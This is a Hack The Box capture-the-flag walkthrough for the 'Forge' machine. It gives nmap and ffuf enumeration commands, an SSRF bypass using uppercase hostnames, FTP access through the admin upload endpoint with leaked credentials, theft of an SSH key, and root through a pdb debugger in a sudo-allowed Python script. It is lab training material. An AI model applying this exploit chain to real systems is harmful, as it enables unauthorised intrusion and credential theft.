HTB — Forge Walkthroughs
--
Enumeration
Scan forge machine with nmap, using command :
nmap -sV -sC {ip}
- -sV — shows port versions
- -sC — run script scan
As we can see only 21, 22 and 80 ports are opened
- 21 — FTP
- 22 — SSH
- 80 — HTTP
port 80 contains http://forge.htb address. so add it into /etc/hosts file.
next when we open http://forge.htb, we should be able to see website
make directory scan with FFUF
ffuf -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://forge.htb/FUZZ
- -c — colored status codes
- -w — wordlist path
- -u — website address
after this, we will notice that only interesting folder is upload directory, where we can upload files from our machine and from website address.
at this point we can upload php reverse shell or image file which contain reverse shell in metatada, but that attack vector does not work. we should enumerate more…
lets make DNS scan with ffuf :
ffuf -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H “HOST : FUZZ.forge.htb” -u http://forge.htb/ -fl 10
- -c — colored status codes
- -w — wordlist path
- -H — make DNS payload
- -u — target address
- -fl — ignore lines in response code
result shows that there is admin subdomain. add it into /etc/hosts file and open that address
unfortunately this page is allowed for localhost only. We can use burp suite to bypass IP restrictions
- X-Originating-IP: 127.0.0.1
- X-Forwarded-For: 127.0.0.1
- X-Remote-IP: 127.0.0.1
- X-Remote-Addr: 127.0.0.1
but it does not work. for more information open this LINK
we will notice that we can upload files from website. lets upload admin.forge.htb into it.
here we go. we see that this address is blacklisted. so lets bypass this restriction.
use address like http://ADMIN.FORGE.HTB instead of http://admin.forge.htb
We bypassed restriction, but it is not what we except, because address does not contain anything.
at this point we should use CURL to see content of this address.
as we can see, we are able to see content of this address. dig into the code and see that /announcements folder is available, so send http://ADMIN.FORGE.HTB/announcements into upload directory
and again use curl to see content of this address.
congratulations, we got FTP credentials user:heightofsecurity123!
but FTP is filtered, which means that we can access it only from localhost. we have to access it via browser. as it is mentioned in the code, admin.forge.htb/upload address have FTP and FTPS support. so use that credentials to login that address via FTP.
send http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@FORGE.HTB into upload directory
open with curl and we be able to see user.txt
to open user.txt, send http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@FORGE.HTB/user.txt into upload directory and open it via CURL.
congratulations, we got user.txt but what about privilege escalation ?
Privilege Escalation
Firstly we need to gain access on the server via SSH. we can do it with id_rsa key which is into .ssh folder of FTP.
send http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@FORGE.HTB/.ssh/ into upload directory and then open link via CURL. result should be like this
at this point we can steal id_rsa and then login with ssh with command :
ssh -i id_rsa user@forge.htb
We are in.
after command sudo -l (which tell us on which files we have sudo access ) we will notice that we have sudo access to /opt/remote-manage.py.
lets dig into the code.
our goal is to run the program with a pdb module. for it we have to make another ssh conenction, run /usr/bin/python3 /opt/remote-manage.py , and then connect via nc
run /usr/bin/python3 /opt/remote-manage.py
connect via nc from another ssh connection and enter password secretadminpassword which is stored into remote-manage.py
note that in your case connect port will be different
next we have to break program to run pdb module. press CTRL+C
then you will get pdb debugging mode on the first ssh connection
after this we can run command : subprocess.run(“cat /root/root.txt”, shell=True) to get root.txt content.
Congratulations…